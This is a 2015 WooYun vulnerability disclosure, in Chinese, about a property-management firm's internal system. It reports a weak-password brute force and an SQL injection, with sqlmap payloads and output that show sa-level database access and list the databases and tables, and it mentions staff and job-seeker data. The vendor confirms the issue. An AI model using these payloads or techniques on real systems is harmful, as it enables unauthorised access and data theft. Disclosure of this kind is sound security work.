当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157711

漏洞标题:中航物业某系统弱口令/SQL注入漏洞

相关厂商:中航物业

漏洞作者: 心云

提交时间:2015-12-03 22:06

修复时间:2016-01-22 11:14

公开时间:2016-01-22 11:14

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-03: 细节已通知厂商并且等待厂商处理中
2015-12-08: 厂商已经确认,细节仅向厂商公开
2015-12-18: 细节向核心白帽子及相关领域专家公开
2015-12-28: 细节向普通白帽子公开
2016-01-07: 细节向实习白帽子公开
2016-01-22: 细节向公众公开

简要描述:

RT

详细说明:

中航物业管理有限公司是深圳知名品牌, 2007年荣膺深圳市福田区第一届区长质量奖,2013年荣登深圳市市长质量奖榜单,同时,中航物业是中航国际成员企业,中航地产(股票代码000043)的全资子公司,中国物业管理行业首批国家一级资质企业,中国物业管理协会副会长单位,深圳市物业管理协会副会长单位。中航物业以全力打造中国最大的机构物业集成服务商为愿景,连续多年在全国物业管理行业排名前列,公司品牌价值超五亿。
0X01 弱口令
漏洞地址:

http://**.**.**.**/login/Default.aspx


登录处有个很有趣的提示
有人的密码太简单 所以在密码前加上cpm登录

这个提示很好.png


既然这样,那我就拿top 500 爆破,密码 cpm123456
果然,爆出好几个:

爆出几个用户.png


但是这个地方,不知道为什么,我用谷歌浏览器登录不了
换火狐 也只成功了一个 不知道为啥

登录成功.png


邮件:

邮件.png


公司通讯录:

通讯录.png


0X02 SQL注入漏洞
登录后,随便找就找到一个注入
漏洞地址:

http://**.**.**.**/atd/main.asp?LOGON_USER=liuqiang


单引号报错:

单引号报错.png


[17:29:46] [INFO] GET parameter 'LOGON_USER' is 'Generic UNION query (NULL) - 1 to 20 col
GET parameter 'LOGON_USER' is vulnerable. Do you want to keep testing the others (if any)
sqlmap identified the following injection point(s) with a total of 216 HTTP(s) requests:
---
Parameter: LOGON_USER (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: LOGON_USER=liuqiang' AND 3814=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(9
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: LOGON_USER=liuqiang';WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (comment)
    Payload: LOGON_USER=liuqiang' WAITFOR DELAY '0:0:5'--
    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: LOGON_USER=liuqiang' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NUL
+CHAR(121)+CHAR(82)+CHAR(105)+CHAR(97)+CHAR(110)+CHAR(108)+CHAR(107)+CHAR(111)+CHAR(82)+C
---
[17:29:46] [INFO] testing Microsoft SQL Server
[17:29:46] [INFO] confirming Microsoft SQL Server
[17:29:50] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2008
[17:29:50] [INFO] fetching database names
[17:29:50] [INFO] the SQL query used returns 23 entries
[17:29:50] [INFO] retrieved: atendence
[17:29:50] [INFO] retrieved: caiwu-flow
[17:29:50] [INFO] retrieved: cpmcrm
[17:29:50] [INFO] retrieved: cpmdata
[17:29:50] [INFO] retrieved: cpmeq
[17:29:50] [INFO] retrieved: cpmoa_workflow
[17:29:50] [INFO] retrieved: cpmoa_workflow
[17:29:51] [INFO] retrieved: cpmpackage
[17:29:51] [INFO] retrieved: drm
[17:29:51] [INFO] retrieved: engineering
[17:29:51] [INFO] retrieved: HKDA_CPM_DA
[17:29:51] [INFO] retrieved: master
[17:29:51] [INFO] retrieved: model
[17:29:51] [INFO] retrieved: msdb
[17:29:51] [INFO] retrieved: nanshan_flow
[17:29:51] [INFO] retrieved: Omisguilin
[17:29:51] [INFO] retrieved: OmisNCandXM
[17:29:51] [INFO] retrieved: ReportServer
[17:29:52] [INFO] retrieved: ReportServerTempDB
[17:29:52] [INFO] retrieved: tempdb
[17:29:52] [INFO] retrieved: web
[17:29:52] [INFO] retrieved: webTest
[17:29:52] [INFO] retrieved: ZhongHang
available databases [22]:
[*] atendence
[*] caiwu-flow
[*] cpmcrm
[*] cpmdata
[*] cpmeq
[*] cpmoa_workflow
[*] cpmpackage
[*] drm
[*] engineering
[*] HKDA_CPM_DA
[*] master
[*] model
[*] msdb
[*] nanshan_flow
[*] Omisguilin
[*] OmisNCandXM
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] web
[*] webTest
[*] ZhongHang


发现还是sa 用户,当前是dba:

sa-dba-22个数据库.png


表还挺多:
<code>
Database: web
[75 tables]
+-----------------------------------------------------------+
| Advertisement |
| Answer |
| CountContent |
| CountIP |
| Count_Iplocal |
| CounterInfo |
| CounterView |
| DLCategory |
| Download |
| Education |
| Employ_User |
| Employ_User |
| Hr_User |
| HumanResource |
| Industry |
| Job |
| JobRefer |
| JobUser |
| Links |
| MagazineCate |
| MagazineCate |
| MagazineConfig |
| MagazineItem |
| MagazineNO |
| MemberNews |
| Message |
| News |
| Person |
| PriceList_Detail |
| PriceList_Detail |
| PriceRequest |
| ProductDownLoad |
| ProductDownLoad |
| ProductItemOrder |
| ProductOrderDetail |
| ProductOrderDetail |
| ProductType |
| Question |
| SpecalizeCategory |
| SpecalizeCategory |
| Subject |
| SysFunction |
| SysLang |
| SysLogonLog |
| SysMenu |
| SysModule |
| SysParamContent |
| SysParamTitle |
| SysRightFunction |
| SysRightFunction |
| SysRole |
| SysSystemLog |
| SysUser |
| TempShopCar |
| TemplateCategory |
| TemplateCategory |
| Trade |
| TradeShows |
| UserClass |
| UserRequst |
| WebParam |
| area |
| cms_user |
| dtproperties |
| edujobuser |
| flash |
| ip |
| jobusework |
| keyword |
| mysave |
| pShopCar |
| province |
| uVoteContent |
| uVoteHistory |
| uVoteTitle |
+-----------------------------------------------------------+
Database: tempdb
[6 tables]
+-----------------------------------------------------------+
| #1D53A4F8 |
| #1E47C931 |
| #1F3BED6A |
| #230C7E4E |
| #2400A287 |
| #24F4C6C0 |
+-----------------------------------------------------------+
Database: OmisNCandXM
[121 tables]
+-----------------------------------------------------------+
| AcceptanceStandard_Attachment_Mapping |
| AccountRole_Menu_ActionItem |
| AccountRole_Menu_ActionItem |
| AccountRole_Menu_Mapping |
| Account_AccountRole_BaseDictionary |
| Account_AccountRole_BaseDictionary |
| Account_AccountRole_Mapping |
| Account_AccountRole_OrganizationStructrue_Mapping |
| ActionItem |
| ActivityLog |
| ActivityLogType |
| AdditionalComments |
| AddressInfo_Attachment_Mapping |
| AddressInfo_Attachment_Mapping |
| Announcement |
| Attachment |
| BaseDictionary |
| Booking |
| CallRecord |
| CategoryType |
| CompletionLog |
| CustomerInformationAssociate |
| CustomerInformationAssociate |
| DeviceCategory_Attachment_Mapping |
| DeviceCategory_Attachment_Mapping |
| DeviceCategory_CustomField_Mapping |
| DeviceCategory_MeasureParameter_Mapping |
| DeviceCustomField |
| DeviceOptionLog |
| Device_Attachment_Mapping |
| Device_Attachment_Mapping |
| Device_CustomField_Mapping |
| Device_DimensionCategory_Mapping |
| Device_MeasureParameter_Mapping |
| DimensionCategory |
| DimensionCategory |
| DispatchAndProcessingResponsible |
| DispatchAndProcessing_Attachment_Mapping |
| DispatchAndProcessing_Attachment_Mapping |
| DispatchRecord |
| HelpDocument |
| Log |
| MaterialAllot_Material_Mapping |
| MaterialAllot_Material_Mapping |
| MaterialAllot_Material_Mapping |
| MaterialCategory |
| MaterialInformation |
| MaterialPrice |
| MaterialRelease_Material_Mapping |
| MaterialRelease_Material_Mapping |
| MaterialWarehousing_Material_Mapping |
| MaterialWarehousing_Material_Mapping |
| MeasureParameter |
| MeasureRange |
| Menu |
| MessageRecords |
| Mutual_Attachment_Mapping |
| Mutual_Attachment_Mapping |
| OnlineBooking_Attachment_Mapping |
| OnlineBooking_Attachment_Mapping |
| OrganizationStructrue_DimensionCategory_Mapping |
| OrganizationStructrue_DimensionCategory_Mapping |
| PatrolCategoryInfo |
| PatrolStandardInfo |
| ReadKnown |
| ReceiptInformationAcceptanceStandard_Attachment_Mapping |
| ReceiptInformationStepStandard_Attachment_Mapping |
| ReceiptInformation_Attachment_Mapping |
| ReceiptInformation_Attachment_Mapping |
| ReceiptInformation_StepAcceptanceStandard_Mapping |
| ReceiptLog |
| ReturnVisit |
| RouteSite |
| ScheduleTask |
| SendMessagesByTemp |
| Setting |
| Sign |
| StaffSkills |
| StaffStatus |
| StaffStatusTime |
| StandardInfoVersion |
| StandardInfo_Attachment_Mapping |
| StandardInfo_Attachment_Mapping |
| StepAcceptanceStandard |
| StepStandard_Attachment_Mapping |
| Stock |
| StoreroomCheck_Material_Mapping |
| StoreroomCheck_Material_Mapping |
| StoreroomCheck_Material_Mapping |
| SupplierCategory |
| SupplierCategory |
| TaskImplementExceptionInfo |
| TaskImplementMeasureParameterAudit |
| TaskImplementOptionLog |
| TaskImplementStandardAudit |
| TaskImplement_AccountRole |
| TaskImplement_AccountRole |
| TaskImplement_AccountRole |
| TaskImplement_Device_Mapping |
| TaskImplement_MeasureParameter_Device |
| TaskImplement_MeasureParameter_OperatingData_Attachment |
| TaskImplement_MeasureParameter_OperatingData_Attachment |
| TaskImplement_PatrolStandardInfo_OperatingData_Attachment |
| TaskImplement_PatrolStandardInfo_OperatingData_Attachment |
| TaskImplement_TaskRoute_Mapping |
| TaskItemResult_Attachment_Mapping |
| TaskItem_Attachment_Mapping |
| TaskItem_Attachment_Mapping |
| TaskLog |
| TaskPlanOptionLog |
| TaskPlanTimer |
| TaskPlan_AccountRole |
| TaskPlan_AccountRole |
| TaskPlan_Device_Mapping |
| TaskPlan_MeasureParameter_Device |
| TaskPlan_TaskRoute_Mapping |
| TaskTemplateItem_Attachment_Mapping |
| TaskTemplateItem_Attachment_Mapping |
| TaskTemplateItem_Attachment_Mapping |
| Unit |
| sysdiagrams |
+-----------------------------------------------------------+
Database: drm
[42 tables]
+-----------------------------------------------------------+
| CPM_BUILDING |
| CPM_CONTACT |
| CPM_CUSTOMER$ |
| CPM_CUSTOMER$ |
| CPM_DEPARTMENT_MARK |
| CPM_DEPARTMENT_MARK |
| CPM_DEPT_FUN |
| CPM_DEPT_FUN |
| CPM_DEPT_TYPE |
| CPM_FLOOR |
| CPM_FORM_MATERIALS |
| CPM_FORM_PROPERTY |
| CPM_GROUP |
| CPM_LOG |
| CPM_MARK |
| CPM_MODULECTR |
| CPM_MODULECTR |
| CPM_NETPAGEAREA |
| CPM_NETPAGEBUILDING |
| CPM_NETPAGECHANNELEVENT |
| CPM_NETPAGECHANNELEVENT |
| CPM_NETPAGEEVENT |
| CPM_NETPAGEFLOW |
| CPM_NETPAGENATUREEVENT |
| CPM_NETPAGENATUREEVENT |
| CPM_NETPAGERECORDER |
| CPM_NETPAGESTATE |
| CPM_NETPAGETYPE |
| CPM_NETPAGEUSER |
| CPM_NETPAGE_GROUP |
| CPM_NETPAGE_MODULECTR |
| CPM_NETPAGE_MODULECTR |
| CPM_PROPERTY_VALUE |
| CPM_PROPERTY_VALUE |
| CPM_REPAIRFORM |
| CPM_REPAIR_PEOPLE |
| CPM_REPAIR_WAY |
| CPM_USER |
| CPM_WXREN |
| cpm_netpage_user |
| dtproperties |
| pangolin_test_table |
+-----------------------------------------------------------+
Database: ReportServerTempDB
[9 tables]
+-----------------------------------------------------------+
| ChunkData |
| ChunkSegmentMapping |
| ExecutionCache |
| PersistedStream |
| SegmentedChunk |
| SegmentedChunk |
| SessionData |
| SessionLock |
| SnapshotData |
+-----------------------------------------------------------+
Database: atendence
[26 tables]
+-----------------------------------------------------------+
| ADMIN_USERn |
| ADMIN_USERn |
| ATTENDENCE |
| ROLE |
| Sheet3$ |
| TIME |
| Ts_User |
| about |
| adimin_userback |
| count |
| dep_close |
| deptlist |
| deptlist |
| dtproperties |
| emp_mov |
| modulectr |
| modulectr |
| nianxiu1 |
| nianxiu1 |
| people1 |
| people_atd_20090120 |
| people_atd_20090120 |
| peopleatd |
| test |
| tongji |
| user_group |
+-----------------------------------------------------------+
Database: cpmpackage
[7 tables]
+-----------------------------------------------------------+
| Pg_Batch |
| Pg_Cust |
| Pg_Floor |
| Pg_FromType |
| Pg_PackageBatch |
| Pg_PackageBatch |
| Pg_Type |
+-----------------------------------------------------------+
Database: ZhongHang
[103 tables]
+-----------------------------------------------------------+
| CMS_AdsPlace |
| CMS_AdsPlace |
| CMS_Advertisement |
| CMS_AttachmentCategory |
| CMS_AttachmentCategory |
| CMS_AttachmentRelation |
| CMS_Author |
| CMS_BadWord |
| CMS_Comments |
| CMS_CommonField |
| CMS_Content |
| CMS_CreateFile |
| CMS_DictItem |
| CMS_Dicts |
| CMS_DownloadUrl |
| CMS_Feedback |
| CMS_Field |
| CMS_Gallery |
| CMS_IP |
| CMS_KeyLink |
| CMS_Keyword |
| CMS_LY |
| CMS_LeaveWord |
| CMS_Links |
| CMS_Message |
| CMS_Model |
| CMS_Nodes |
| CMS_PointsLog |
| CMS_PositionApply |
| CMS_Sample |
| CMS_SettingsCategory |
| CMS_SettingsCategory |
| CMS_Source |
| CMS_SpecialContent |
| CMS_SpecialContent |
| CMS_SpecialNodeMap |
| CMS_SpecialNodeMap |
| CMS_Stat_CountContent |
| CMS_Stat_CounterInfo |
| CMS_Stat_CounterView |
| CMS_Stat_MySave |
| CMS_Test |
| CMS_U_Banner |
| CMS_U_Buy |
| CMS_U_Conven |
| CMS_U_Housing |
| CMS_U_News |
| CMS_U_Order |
| CMS_U_Page |
| CMS_U_Photo |
| CMS_U_Rental |
| CMS_U_Yhjd |
| CMS_U_advert |
| CMS_U_dzqk |
| CMS_U_friendlink |
| CMS_U_qxfp |
| CMS_U_shop |
| CMS_U_wx |
| CMS_U_xqtz |
| CMS_UserDetail |
| CMS_UserDetail |
| CMS_UserRank |
| CompanyInfo |
| TopFile |
| __corp_info |
| dtproperties |
| tbAccSwitch |
| tbAccount |
| tbAttendClass |
| tbAttendUserClass |
| tbCatalog |
| tbDefaultInfo |
| tbEmployee |
| tbGroup |
| tbGroupUser |
| tbICQMsg |
| tbIndexInfo |
| tbLogEvents |
| tbLogin |
| tbModule |
| tbOperate |
| tbProduct |
| tbProductUser |
| tbPurview |
| tbPurviewTemp |
| tbQuickLinkInfo |
| tbRecOperate |
| tbRefrenceDiary |
| tbResource |
| tbRoles |
| tbSafeStrategy |
| tbSonCompany |
| tbStrategyLimit |
| tbSysDiary |
| tbTableID |
| tbUsebasicData |
| tbUserIndexConfig |
| tbUserIndexInfo |
| tbUserOperateDiary |
| tbbasicDataCode |
| tbbasicDataCode |
| tbdept |
| vPro_ProUser |
+-----------------------------------------------------------+
Database: HKDA_CPM_DA
[140 tables]
+-----------------------------------------------------------+
| AG_ROLE |
| AG_USER_ROLE |
| Appraiselog |
| BorrowAccessNode |
| BorrowInfo |
| BorrowRight |
| ChdTable |
| CodeLxZHZT |
| Databack |
| DispPath |
| LLQSZTABLE |
| Node_Access |
| PaperAccessNode |
| PaperInfo |
| PaperTree |
| Public_Vol_view |
| Public_file_view |
| TABLE1 |
| TABLE2 |
| TmpRight |
| UseLog |
| Vborrowlog |
| WorkStation |
| YTmpTable |
| ZHTJ |
| aamstablename |
| accessnode |
| accessnode |
| backdossField |
| backinfo |
| borrowlog |
| borrowuser |
| codelist |
| codetable0 |
| codetable1 |
| codetable2 |
| codetable3 |
| codetable4 |
| codetable5 |
| codetable6 |
| codetable_ce0 |
| codetable_ce1 |
| codetable_ce2 |
| codetable_ce3 |
| codetable_ce4 |
| codetable_ce5 |
| codetable_ce6 |
| d_libfile001 |
| d_libfile002 |
| d_libfile003 |
| d_libfile004 |
| d_libfile005 |
| d_libvol001 |
| d_libvol002 |
| d_libvol003 |
| daserialtable |
| databaselib |
| dtproperties |
| fenfa_Return |
| fenfa_Tb2 |
| fenfa_Tbhead |
| fieldAppraiselog |
| fielddiaobo2 |
| fielddiaobo2 |
| fieldfasong2 |
| fieldfasong2 |
| fieldfenfa1 |
| fieldfenfa1 |
| fieldfile001 |
| fieldfile002 |
| fieldfile003 |
| fieldfile004 |
| fieldfile005 |
| fieldfilem |
| fieldggd |
| fieldjsd |
| fieldproposeInfo |
| fieldrecycle_bin_file |
| fieldrecycle_bin_vol |
| fieldsyslog |
| fielduselog |
| fieldvol001 |
| fieldvol002 |
| fieldvol003 |
| file_UploadPath |
| flbtable_bak |
| flbtable_bak |
| ftp_table |
| grouplist |
| iconlist |
| libchange |
| libdiaobo1 |
| libdiaobo2 |
| libfasong1 |
| libfasong2 |
| libfenfa1 |
| libfenfa2 |
| libfile001 |
| libfile002 |
| libfile003 |
| libfile004 |
| libfile005 |
| libggd |
| libjsd |
| libtech001 |
| libtech001 |
| libvol001 |
| libvol002 |
| libvol003 |
| p_libfile001 |
| p_libfile002 |
| p_libfile003 |
| p_libfile004 |
| p_libfile005 |
| p_libvol001 |
| p_libvol002 |
| p_libvol003 |
| proposeInfo |
| publicfield_change |
| publicfield_file |
| publicfield_tech |
| publicfield_vol |
| recycle_bin_file |
| recycle_bin_vol |
| report_card |
| report_label |
| report_mb |
| report_stat |
| stat_table |
| stat_table |
| syslog |
| tab_dzwj |
| table_sqqd |
| test |
| treebdf |
| user_group |
| userlist |
| webUserLog_Login |
| webUserLog_Operation |
| fieldborrowlog |
+-----------------------------------------------------------+
Database: msdb
[137 tables]
+-----------------------------------------------------------+
| MSdatatype_mappings |
| MSdbms_datatype_mapping |
| MSdbms_datatype_mapping |
| MSdbms_datatype_mapping |
| MSdbms_map |
| backupfilegroup |
| backupfilegroup |
| backupmediafamily |
| backupmediaset |
| backupset |
| log_shipping_monitor_alert |
| log_shipping_monitor_error_detail |
| log_shipping_monitor_history_detail |
| log_shipping_monitor_primary |
| log_shipping_monitor_secondary |
| log_shipping_primaries |
| log_shipping_primary_databases |
| log_shipping_primary_secondaries |
| log_shipping_secondaries |
| log_shipping_secondary_databases |
| log_shipping_secondary_databases |
| logmarkhistory |
| restorefilegroup |
| restorefilegroup |
| restorehistory |
| sqlagent_info |
| suspect_pages |
| sysalerts |
| syscachedcredentials |
| syscategories |
| syscollector_blobs_internal |
| syscollector_collection_items_internal |
| syscollector_collection_items_internal |
| syscollector_collection_sets_internal |
| syscollector_collection_sets_internal |
| syscollector_collector_types_internal |
| syscollector_collector_types_internal |
| syscollector_config_store_internal |
| syscollector_config_store_internal |
| syscollector_execution_log_full |
| syscollector_execution_log_full |
| syscollector_execution_log_internal |
| syscollector_execution_stats_internal |
| syscollector_execution_stats_internal |
| syscollector_tsql_query_collector |
| sysdatatypemappings |
| sysdbmaintplan_databases |
| sysdbmaintplan_history |
| sysdbmaintplan_jobs |
| sysdbmaintplans |
| sysdownloadlist |
| sysdtscategories |
| sysdtslog90 |
| sysdtspackagelog |
| sysdtspackages |
| sysdtssteplog |
| sysdtstasklog |
| sysjobactivity |
| sysjobhistory |
| sysjobs_view |
| sysjobs_view |
| sysjobschedules |
| sysjobservers |
| sysjobstepslogs |
| sysjobstepslogs |
| sysmail_account |
| sysmail_allitems |
| sysmail_attachments_transfer |
| sysmail_attachments_transfer |
| sysmail_configuration |
| sysmail_event_log |
| sysmail_faileditems |
| sysmail_log |
| sysmail_mailattachments |
| sysmail_mailitems |
| sysmail_principalprofile |
| sysmail_profileaccount |
| sysmail_profileaccount |
| sysmail_query_transfer |
| sysmail_send_retries |
| sysmail_sentitems |
| sysmail_server |
| sysmail_servertype |
| sysmail_unsentitems |
| sysmaintplan_logdetail |
| sysmaintplan_logdetail |
| sysmaintplan_plans |
| sysmaintplan_subplans |
| sysmanagement_shared_registered_servers_internal |
| sysmanagement_shared_registered_servers_internal |
| sysmanagement_shared_server_groups_internal |
| sysmanagement_shared_server_groups_internal |
| sysnotifications |
| sysoperators |
| sysoriginatingservers_view |
| sysoriginatingservers_view |
| syspolicy_conditions_internal |
| syspolicy_conditions_internal |
| syspolicy_configuration_internal |
| syspolicy_configuration_internal |
| syspolicy_execution_internal |
| syspolicy_facet_events |
| syspolicy_management_facets |
| syspolicy_object_sets_internal |
| syspolicy_object_sets_internal |
| syspolicy_policies_internal |
| syspolicy_policies_internal |
| syspolicy_policy_categories_internal |
| syspolicy_policy_categories_internal |
| syspolicy_policy_category_subscriptions_internal |
| syspolicy_policy_category_subscriptions_internal |
| syspolicy_policy_execution_history_details_internal |
| syspolicy_policy_execution_history_details_internal |
| syspolicy_policy_execution_history_details_internal |
| syspolicy_policy_execution_history_internal |
| syspolicy_system_health_state_internal |
| syspolicy_system_health_state_internal |
| syspolicy_target_set_levels_internal |
| syspolicy_target_set_levels_internal |
| syspolicy_target_sets_internal |
| syspolicy_target_sets_internal |
| sysproxies |
| sysproxylogin |
| sysproxyloginsubsystem_view |
| sysproxysubsystem |
| sysschedules_localserver_view |
| sysschedules_localserver_view |
| syssessions |
| sysssislog |
| sysssispackagefolders |
| sysssispackages |
| syssubsystems |
| systargetservergroupmembers |
| systargetservergroups |
| systargetservers_view |
| systargetservers_view |
| systaskids |
+-----------------------------------------------------------+
Database: webTest
[74 tables]
+-----------------------------------------------------------+
| Advertisement |
| Answer |
| CountContent |
| CountIP |
| Count_Iplocal |
| CounterInfo |
| CounterView |
| DLCategory |
| Download |
| Education |
| Employ_User |
| Employ_User |
| Hr_User |
| HumanResource |
| Industry |
| Job |
| JobRefer |
| JobUser |
| Links |
| MagazineCate |
| MagazineCate |
| MagazineConfig |
| MagazineItem |
| MagazineNO |
| MemberNews |
| Message |
| News |
| Person |
| PriceList_Detail |
| PriceList_Detail |
| PriceRequest |
| ProductDownLoad |
| ProductDownLoad |
| ProductItemOrder |
| ProductOrderDetail |
| ProductOrderDetail |
| ProductType |
| Question |
| SpecalizeCategory |
| SpecalizeCategory |
| Subject |
| SysFunction |
| SysLang |
| SysLogonLog |
| SysMenu |
| SysModule |
| SysParamContent |
| SysParamTitle |
| SysRightFunction |
| SysRightFunction |
| SysRole |
| SysSystemLog |
| SysUser |
| TempShopCar |
| TemplateCategory |
| TemplateCategory |
| Trade |
| TradeShows |
| UserClass |
| UserRequst |
| WebParam |
| area |
| dtproperties |
| edujobuser |
| flash |
| ip |
| jobusework |
| keyword |
| mysave |
| pShopCar |
| province |
| uVoteContent |
| uVoteHistory |
| uVoteTitle |
+-----------------------------------------------------------+
Database: cpmeq
[7 tables]
+-----------------------------------------------------------+
| cpmeq_building_info_db |
| cpmeq_log_db |
| cpmeq_meter_db |
| cpmeq_update_db |
| cpmeq_user_db |
| cpmeq_value_db |
| dtproperties |
+-----------------------------------------------------------+
Database: engineering
[97 tables]
+-----------------------------------------------------------+
| App_pub_Normal_Head |
| Br_ECustomer |
| Br_Product |
| Cst_BYTS |
| Cst_Cost |
| Cst_Issues |
| Cst_Materials |
| Cst_Projects |
| Cst_ServiceStaff |
| Ctr_Contract |
| EA_Issues_FeedBack |
| EA_Monitor |
| Es_ActorCond |
| Es_ActorExtDef |
| Es_Agent |
| Es_AppOp |
| Es_AppOp |
| Es_Attachment |
| Es_BusAction |
| Es_BusDef |
| Es_Catalog |
| Es_DictContent |
| Es_DictItem |
| Es_FMFields |
| Es_Fields |
| Es_FlowFromTo |
| Es_FlowModel |
| Es_Folder |
| Es_Forms |
| Es_GenNo |
| Es_LookTable |
| Es_MessageFromTo |
| Es_MessageFromTo |
| Es_MessageOpinion |
| Es_MsgProcess |
| Es_NodeFromTo |
| Es_NodeModel |
| Es_Node_Temp |
| Es_Node_Temp |
| Es_QueryCondition |
| Es_ReceiveList |
| Es_Relation_Rel |
| Es_Relations |
| Es_UserFlow |
| Es_Views |
| Es_f_Actors |
| Es_n_m_Action |
| Es_n_m_Actor |
| Es_n_m_Field |
| Es_n_m_Flow |
| Es_n_m_Link |
| Exp_ExpenseItems |
| Exp_ExpenseItems |
| Exp_SubjectBudget |
| Exp_SubjectBudget |
| Inf_Attachment |
| Inf_BBS |
| Inf_Category_Template |
| Inf_Category_Template |
| Inf_DefineItemData |
| Inf_DefineItemData |
| Inf_DeptManagerSet |
| Inf_FreeTalkUser |
| Inf_Information |
| Inf_KMBase |
| Inf_Rel |
| Inf_Right |
| Inf_Score |
| Inf_Sort |
| Inf_Tags |
| OA_AddressListFile |
| OA_Attention |
| OA_EmailNotify |
| OA_NEWS_TYPE |
| OA_NEWS_TYPE |
| OA_Sms |
| Ris_Issues_Mon |
| Ts_ActorCond |
| Ts_ActorMembers |
| Ts_Actors |
| Ts_Dept |
| Ts_IPRanges |
| Ts_Operates |
| Ts_Parameter |
| Ts_Professional |
| Ts_Rights |
| Ts_Sequence |
| Ts_SystemDef |
| Ts_UserDept |
| Ts_UserProfile |
| Ts_User_Temp |
| Ts_User_Temp |
| dtproperties |
| employee |
| es_flowdelelog |
| es_flowdelelog |
| ts_user_test |
+-----------------------------------------------------------+
Database: ReportServer
[33 tables]
+-----------------------------------------------------------+
| ActiveSubscriptions |
| Batch |
| CachePolicy |
| Catalog |
| ChunkData |
| ChunkSegmentMapping |
| ConfigurationInfo |
| DataSource |
| Event |
| ExecutionLog2 |
| ExecutionLog2 |
| ExecutionLogStorage |
| History |
| Keys |
| ModelDrill |
| ModelItemPolicy |
| ModelPerspective |
| Notifications |
| Policies |
| PolicyUserRole |
| ReportSchedule |
| Roles |
| RunningJobs |
| Schedule |
| SecData |
| SegmentedChunk |
| SegmentedChunk |
| ServerParametersInstance |
| SnapshotData |
| SubscriptionsBeingDeleted |
| SubscriptionsBeingDeleted |
| UpgradeInfo |
| Users |
+-----------------------------------------------------------+
Database: master
[361 tables]
+-----------------------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS |
| INFORMATION_SCHEMA.COLUMNS |
| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES |
| INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE |
| INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE |
| INFORMATION_SCHEMA.DOMAINS |
| INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS |
| INFORMATION_SCHEMA.KEY_COLUMN_USAGE |
| INFORMATION_SCHEMA.PARAMETERS |
| INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS |
| INFORMATION_SCHEMA.ROUTINES |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS |
| INFORMATION_SCHEMA.SCHEMATA |
| INFORMATION_SCHEMA.TABLES |
| INFORMATION_SCHEMA.TABLE_CONSTRAINTS |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES |
| INFORMATION_SCHEMA.VIEWS |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE |
| MSreplication_options |
| spt_fallback_db |
| spt_fallback_dev |
| spt_fallback_usg |
| spt_monitor |
| spt_values |
| t_kdaccount_gl |
| sys.all_columns |
| sys.all_objects |
| sys.all_parameters |
| sys.all_sql_modules |
| sys.all_views |
| sys.allocation_units |
| sys.assemblies |
| sys.assembly_files |
| sys.assembly_modules |
| sys.assembly_references |
| sys.assembly_types |
| sys.asymmetric_keys |
| sys.backup_devices |
| sys.certificates |
| sys.change_tracking_databases |
| sys.change_tracking_tables |
| sys.check_constraints |
| sys.column_type_usages |
|

漏洞证明:

people1:

people1.png


jobuser:

18W-jobuser.png


修复方案:

你们更专业

版权声明:转载请注明来源 心云@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-12-08 14:43

厂商回复:

非常感谢您的报告。
报告中的问题已确认并复现.
影响的数据:高
攻击成本:低
造成影响:高
综合评级为:高,rank:10
正在联系相关网站管理单位处置。

最新状态:

暂无